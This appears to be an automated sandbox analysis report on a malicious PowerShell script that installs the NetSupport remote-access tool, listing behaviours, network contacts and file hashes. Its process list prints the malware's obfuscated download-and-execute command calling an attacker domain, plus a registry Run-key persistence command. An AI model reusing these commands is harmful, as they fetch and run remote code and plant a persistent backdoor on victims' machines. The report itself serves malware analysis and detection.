Analysis Overview
SHA256
8347464802fc276d09848d28162f8802566f8795a07521c535c693fdfdaa4c3d
Threat Level: Known bad
The file rt.php.ps1 was found to be: Known bad.
Malicious Activity Summary
NetSupport
Blocklisted process makes network request
Executes dropped EXE
Loads dropped DLL
Adds Run key to start application
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2023-05-30 17:15
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2023-05-30 17:15
Reported
2023-05-30 17:17
Platform
win7-20230220-en
Max time kernel
29s
Max time network
31s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\rt.php.ps1
Network
Files
memory/1208-58-0x000000001B1E0000-0x000000001B4C2000-memory.dmp
memory/1208-59-0x0000000002020000-0x0000000002028000-memory.dmp
memory/1208-60-0x0000000002030000-0x00000000020B0000-memory.dmp
memory/1208-61-0x0000000002030000-0x00000000020B0000-memory.dmp
memory/1208-62-0x0000000002030000-0x00000000020B0000-memory.dmp
memory/1208-63-0x0000000002030000-0x00000000020B0000-memory.dmp
memory/1208-64-0x0000000002030000-0x00000000020B0000-memory.dmp
memory/1208-65-0x0000000002030000-0x00000000020B0000-memory.dmp
memory/1208-66-0x0000000002030000-0x00000000020B0000-memory.dmp
memory/1208-67-0x0000000002030000-0x00000000020B0000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2023-05-30 17:15
Reported
2023-05-30 17:17
Platform
win10v2004-20230220-en
Max time kernel
37s
Max time network
136s
Command Line
Signatures
NetSupport
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\whost.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\whost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\whost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\whost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\whost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\whost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\whost.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ExpirienceHost = "C:\\Users\\Admin\\AppData\\Roaming\\QNSeJO3wL5Kv\\whost.exe" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\whost.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\whost.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3760 wrote to memory of 4176 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 3760 wrote to memory of 4176 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 4176 wrote to memory of 3092 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\HOSTNAME.EXE |
| PID 4176 wrote to memory of 3092 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\HOSTNAME.EXE |
| PID 3760 wrote to memory of 388 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 3760 wrote to memory of 388 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\rt.php.ps1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias rzs $([char]105+[char]110+[char]118+[char]111+[char]107+[char]101+[char]45+[char]101+[char]120+[char]112+[char]114+[char]101+[char]115+[char]115+[char]105+[char]111+[char]110);$global:block=(New-Object $([char]83+[char]121+[char]115+[char]116+[char]101+[char]109+[char]46+[char]78+[char]101+[char]116+[char]46+[char]87+[char]101+[char]98+[char]67+[char]108+[char]105+[char]101+[char]110+[char]116) ).($([char]68+[char]111+[char]119+[char]110+[char]108+[char]111+[char]97+[char]100+[char]83+[char]116+[char]114+[char]105+[char]110+[char]103) )($([char]104+[char]116+[char]116+[char]112+[char]58+[char]47+[char]47+[char]100+[char]122+[char]55+[char]101+[char]103+[char]46+[char]116+[char]111+[char]112+[char]47+[char]53+[char]49+[char]53+[char]47+[char]115+[char]100+[char]102+[char]122+[char]119+[char]46+[char]112+[char]104+[char]112+[char]63+[char]105+[char]61) +$(hostname));rzs $global:block
C:\Windows\system32\HOSTNAME.EXE
"C:\Windows\system32\HOSTNAME.EXE"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name ExpirienceHost -Value ""C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\whost.exe""
C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\whost.exe
C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\whost.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.3.197.209.in-addr.arpa | udp |
| US | 8.8.8.8:53 | dz7eg.top | udp |
| US | 143.244.162.145:80 | dz7eg.top | tcp |
| US | 8.8.8.8:53 | 145.162.244.143.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.36.251.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fduic.top | udp |
| DE | 167.235.159.22:443 | fduic.top | tcp |
| US | 8.8.8.8:53 | geo.netsupportsoftware.com | udp |
| GB | 62.172.138.67:80 | geo.netsupportsoftware.com | tcp |
| US | 8.8.8.8:53 | 22.159.235.167.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.138.172.62.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.18.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| IE | 20.50.73.11:443 | | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nksic0el.kdc.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3760-133-0x000001D3E5020000-0x000001D3E5042000-memory.dmp
memory/3760-143-0x000001D3E50A0000-0x000001D3E50B0000-memory.dmp
memory/3760-144-0x000001D3E50A0000-0x000001D3E50B0000-memory.dmp
memory/4176-154-0x00000284C6E60000-0x00000284C6E70000-memory.dmp
memory/4176-155-0x00000284C6E60000-0x00000284C6E70000-memory.dmp
memory/4176-156-0x00000284C6E60000-0x00000284C6E70000-memory.dmp
memory/3760-160-0x000001D3E77D0000-0x000001D3E77DA000-memory.dmp
memory/3760-161-0x000001D3E7800000-0x000001D3E7812000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 2f57fde6b33e89a63cf0dfdd6e60a351 |
| SHA1 | 445bf1b07223a04f8a159581a3d37d630273010f |
| SHA256 | 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55 |
| SHA512 | 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220 |
memory/388-190-0x000001EEFDD80000-0x000001EEFDD90000-memory.dmp
memory/388-191-0x000001EEFDD80000-0x000001EEFDD90000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | f5f268a3d8760169bde3db6e00da5e6c |
| SHA1 | 00dc2443a967bf09147612f53ea5fc6a2cfb0b40 |
| SHA256 | b0f800d487f826601ef6a21ddd141c41d57182c1601e2adf1c0132b98c8d73b5 |
| SHA512 | c067de9cfefea861a08a29a1b10bcf93d360ec555bdd9fd24fb8f6ce6be432961a1acc4ccef786e953d86ef836db27fdef5fd5951930edd00e1c4fcfa3a9d67e |
C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\whost.exe
| MD5 | c0eb3eac96511077dafc0afa64c6388c |
| SHA1 | 33e81f25493eda3bbf0b7cdcddd523547fa6c31e |
| SHA256 | eec4f18f3655f7eab0c08783ad42d2b3ce3ef21ecad7394e165f11acdb41c42a |
| SHA512 | 2632bef55323d9a272e1519e2b2792527d28cbd9fe6a9f9d253e5729978be0de6f36b8e3b2acee70449ba22a33efb41c82c82afe19dad14698b3ada0006ca7fc |
C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\whost.exe
| MD5 | c0eb3eac96511077dafc0afa64c6388c |
| SHA1 | 33e81f25493eda3bbf0b7cdcddd523547fa6c31e |
| SHA256 | eec4f18f3655f7eab0c08783ad42d2b3ce3ef21ecad7394e165f11acdb41c42a |
| SHA512 | 2632bef55323d9a272e1519e2b2792527d28cbd9fe6a9f9d253e5729978be0de6f36b8e3b2acee70449ba22a33efb41c82c82afe19dad14698b3ada0006ca7fc |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\PCICL32.dll
| MD5 | 00587238d16012152c2e951a087f2cc9 |
| SHA1 | c4e27a43075ce993ff6bb033360af386b2fc58ff |
| SHA256 | 63aa18c32af7144156e7ee2d5ba0fa4f5872a7deb56894f6f96505cbc9afe6f8 |
| SHA512 | 637950a1f78d3f3d02c30a49a16e91cf3dfccc59104041876789bd7fdf9224d187209547766b91404c67319e13d1606da7cec397315495962cbf3e2ccd5f1226 |
C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\PCICL32.DLL
| MD5 | 00587238d16012152c2e951a087f2cc9 |
| SHA1 | c4e27a43075ce993ff6bb033360af386b2fc58ff |
| SHA256 | 63aa18c32af7144156e7ee2d5ba0fa4f5872a7deb56894f6f96505cbc9afe6f8 |
| SHA512 | 637950a1f78d3f3d02c30a49a16e91cf3dfccc59104041876789bd7fdf9224d187209547766b91404c67319e13d1606da7cec397315495962cbf3e2ccd5f1226 |
C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\pcichek.dll
| MD5 | a0b9388c5f18e27266a31f8c5765b263 |
| SHA1 | 906f7e94f841d464d4da144f7c858fa2160e36db |
| SHA256 | 313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a |
| SHA512 | 6051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd |
C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\PCICHEK.DLL
| MD5 | a0b9388c5f18e27266a31f8c5765b263 |
| SHA1 | 906f7e94f841d464d4da144f7c858fa2160e36db |
| SHA256 | 313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a |
| SHA512 | 6051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd |
C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\pcicapi.dll
| MD5 | dcde2248d19c778a41aa165866dd52d0 |
| SHA1 | 7ec84be84fe23f0b0093b647538737e1f19ebb03 |
| SHA256 | 9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917 |
| SHA512 | c5d170d420f1aeb9bcd606a282af6e8da04ae45c83d07faaacb73ff2e27f4188b09446ce508620124f6d9b447a40a23620cfb39b79f02b04bb9e513866352166 |
C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\pcicapi.dll
| MD5 | dcde2248d19c778a41aa165866dd52d0 |
| SHA1 | 7ec84be84fe23f0b0093b647538737e1f19ebb03 |
| SHA256 | 9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917 |
| SHA512 | c5d170d420f1aeb9bcd606a282af6e8da04ae45c83d07faaacb73ff2e27f4188b09446ce508620124f6d9b447a40a23620cfb39b79f02b04bb9e513866352166 |
C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\MSVCR100.dll
| MD5 | 0e37fbfa79d349d672456923ec5fbbe3 |
| SHA1 | 4e880fc7625ccf8d9ca799d5b94ce2b1e7597335 |
| SHA256 | 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18 |
| SHA512 | 2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630 |
C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\msvcr100.dll
| MD5 | 0e37fbfa79d349d672456923ec5fbbe3 |
| SHA1 | 4e880fc7625ccf8d9ca799d5b94ce2b1e7597335 |
| SHA256 | 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18 |
| SHA512 | 2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630 |
C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\msvcr100.dll
| MD5 | 0e37fbfa79d349d672456923ec5fbbe3 |
| SHA1 | 4e880fc7625ccf8d9ca799d5b94ce2b1e7597335 |
| SHA256 | 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18 |
| SHA512 | 2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630 |
C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\client32.ini
| MD5 | 5d2b788f10e973fce372fa2e4ececd4e |
| SHA1 | 40cc5404b896dd6ed657bba39ffdb6d63f45e9a1 |
| SHA256 | 483b4c008ab680dd0958f5f09c55d6dc35f90fca1c3835fb864a1e8fcb598475 |
| SHA512 | 168c7d962ab5b813e426eca03fd718c05a34d393b2fd79b3685fdcb408ae29399c4b6de8decfa893f039eb871425579cffdbf55465830a7801c065491c95ba20 |
C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\NSM.LIC
| MD5 | 390c964070626a64888d385c514f568e |
| SHA1 | a556209655dcb5e939fd404f57d199f2bb6da9b3 |
| SHA256 | ad0d05305fdeb3736c1e8d49c3a6746073d27b4703eb6de6589bdc4aa72d7b54 |
| SHA512 | f089c59a24f33410cf98fba7ea0dd2ca0fd997efc9a03e5355cde3c1a1f4a78b13cebd387099b9de824bffea01c489d8f0e90df56f89973007dabb6afdde607f |
C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\HTCTL32.DLL
| MD5 | 2d3b207c8a48148296156e5725426c7f |
| SHA1 | ad464eb7cf5c19c8a443ab5b590440b32dbc618f |
| SHA256 | edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796 |
| SHA512 | 55c791705993b83c9b26a8dbd545d7e149c42ee358ecece638128ee271e85b4fdbfd6fbae61d13533bf39ae752144e2cc2c5edcda955f18c37a785084db0860c |
C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\HTCTL32.DLL
| MD5 | 2d3b207c8a48148296156e5725426c7f |
| SHA1 | ad464eb7cf5c19c8a443ab5b590440b32dbc618f |
| SHA256 | edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796 |
| SHA512 | 55c791705993b83c9b26a8dbd545d7e149c42ee358ecece638128ee271e85b4fdbfd6fbae61d13533bf39ae752144e2cc2c5edcda955f18c37a785084db0860c |